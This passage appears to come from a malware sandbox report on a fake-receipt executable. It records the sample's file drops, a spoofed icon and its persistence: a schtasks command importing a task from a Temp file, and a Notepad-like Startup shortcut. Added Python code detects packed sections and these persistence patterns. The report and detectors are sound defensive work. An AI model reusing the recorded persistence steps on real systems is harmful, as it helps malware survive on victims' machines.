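OBFUSCATED_NAMES = ['z67SfmJXSx', 'ufeSLnOX5j', 'DVHSnYnut6', 'DqeSFtDBHv', 'tQqSWj8e6J',
                    'jhuSodZoLX', 'btaPWmIotAWIVmmlEr', 'FWsc9ORZIMRwoKdcTt', 'ppUSSLpsuk',
                    'OYHSa6Tp1a']
# ... and framework overrides the obfuscator could not rename, collected from several classes.
BENIGN_NAMES = ['Dispose', 'ToString', 'GetEditStyle', 'Next', 'NextBytes']


if __name__ == "__main__":
    for label, blob in (("plain", PLAIN_SECTION), ("packed", PACKED_SECTION)):
        print(f"{label:7s} section: {shannon_entropy(blob):.3f} bits/byte "
              f"packed={section_looks_packed(blob)}")
    for label, names in (("obfuscated", OBFUSCATED_NAMES), ("benign", BENIGN_NAMES)):
        print(f"{label:10s} names:   {shannon_entropy(''.join(names)):.3f} bits/char "
              f"obfuscated={names_look_obfuscated(names)}")
```

The section check is only meaningful on executable sections: resource sections holding compressed images legitimately score high, and a .text of 7.6 bits/byte like the one above cannot be machine code, so the real code is unpacked at run time, which is consistent with the memory dumps the method names were read from.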
Source: C:\Users\user\Desktop\Recaipt202431029.exe | File created: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
Source: C:\Users\user\Desktop\Recaipt202431029.exe | File created: C:\Users\user\AppData\Roaming\Notepab .exe

Boot Survival

Source: C:\Users\user\Desktop\Recaipt202431029.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp"
Source: C:\Users\user\Desktop\Recaipt202431029.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab .lnk (logged twice)

Note: the sample is a 32-bit process, so the System32 path in the command line resolves to SysWOW64 through WOW64 file system redirection. The task definition is imported from a temporary file (tmp912F.tmp) in the user's Temp folder, which is exactly what the "Scheduled temp file as task from temp location" Sigma rule keys on; the XML content, and therefore the command the task runs, is not reproduced in this section. The shortcut name "Notepab .lnk" (note the space before the extension) mimics Notepad and points at the dropped Notepab .exe.
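Detection logic for the two persistence mechanisms recorded in the Boot Survival entries, as an added example that is neither Joe Sandbox nor Sigma code: a schtasks /Create whose /XML definition lives in the user's Temp directory, and a shortcut dropped into the per-user Startup folder. The event dictionaries are a constructed, simplified stand-in for Sysmon process-create and file-create events; the first two reproduce the command line and path from the report, the last two are benign look-alikes. The explorer.exe exclusion is an assumption about what a normal Startup-folder writer looks like.

```python
"""Hunting checks for scheduled-task-from-Temp and Startup-folder .lnk persistence.
Added example, not Joe Sandbox or Sigma code. Event format is constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Finding:
    rule: str
    evidence: str


_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
_TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
_STARTUP_LNK_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping double-quoted arguments whole."""
    return [quoted or bare for quoted, bare in _TOKEN_RE.findall(cmdline)]


def flag_value(argv: List[str], flag: str) -> Optional[str]:
    """Value following a schtasks-style /FLAG (case-insensitive), or None if absent."""
    for i in range(len(argv) - 1):
        if argv[i].lower() == flag.lower():
            return argv[i + 1]
    return None


def check_process_create(image: str, cmdline: str) -> List[Finding]:
    """schtasks.exe /Create importing its task XML from the user's Temp directory."""
    if not image.lower().endswith("\\schtasks.exe"):
        return []
    argv = tokenize(cmdline)
    if "/create" not in (a.lower() for a in argv):
        return []
    xml = flag_value(argv, "/XML")
    if xml is None or not _TEMP_DIR_RE.search(xml):
        return []
    return [Finding("schtasks_xml_from_temp", f"/TN {flag_value(argv, '/TN')} /XML {xml}")]


def check_file_create(image: str, target: str) -> List[Finding]:
    """Any process other than the shell dropping a shortcut into the Startup folder."""
    if not _STARTUP_LNK_RE.search(target):
        return []
    if image.lower().endswith("\\explorer.exe"):  # assumption: user pinning via the shell is expected
        return []
    return [Finding("startup_lnk_from_user_process", f"{image} -> {target}")]


def scan(events: List[Dict[str, str]]) -> List[Finding]:
    """Run both checks over a list of simplified telemetry events, in order."""
    findings: List[Finding] = []
    for ev in events:
        if ev["type"] == "process_create":
            findings += check_process_create(ev["image"], ev["cmdline"])
        elif ev["type"] == "file_create":
            findings += check_file_create(ev["image"], ev["target"])
    return findings


# Constructed events: two from the report, two benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"type": "process_create",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" '
                r'/XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp"'},
    {"type": "file_create",
     "image": r"C:\Users\user\Desktop\Recaipt202431029.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab .lnk"},
    {"type": "process_create",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"'},
    {"type": "file_create",
     "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.evidence}")
```

In production the /XML path alone is the weak signal; pair the match with the task's registered action (read back from the Tasks registry hive or `schtasks /Query /XML`) so the alert carries the executable the task will launch, which the temp file here hides.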

Hooking and other Techniques for Hiding and Protection

Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: icon (2112).png
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 occurrences)

Note: reading module manifests (.psd1) under the Modules directory is consistent with PowerShell's module auto-discovery, which scans every installed manifest while resolving a cmdlet; on its own it shows that powershell.exe ran commands, not that BitLocker was touched. The icon mismatch is the stronger indicator in this group: the binary carries another application's icon to pass as a legitimate document or tool.
Source: C:\Users\user\Desktop\Recaipt202431029.exe | Process information set: NOOPENFILEERRORBOX (44 occurrences)

Note: SEM_NOOPENFILEERRORBOX, set through SetErrorMode, suppresses the message box the system would otherwise show when a file cannot be found. Managed hosts set it routinely during startup, so these hits carry little weight on their own next to the persistence and file-drop behaviour above.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (111 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
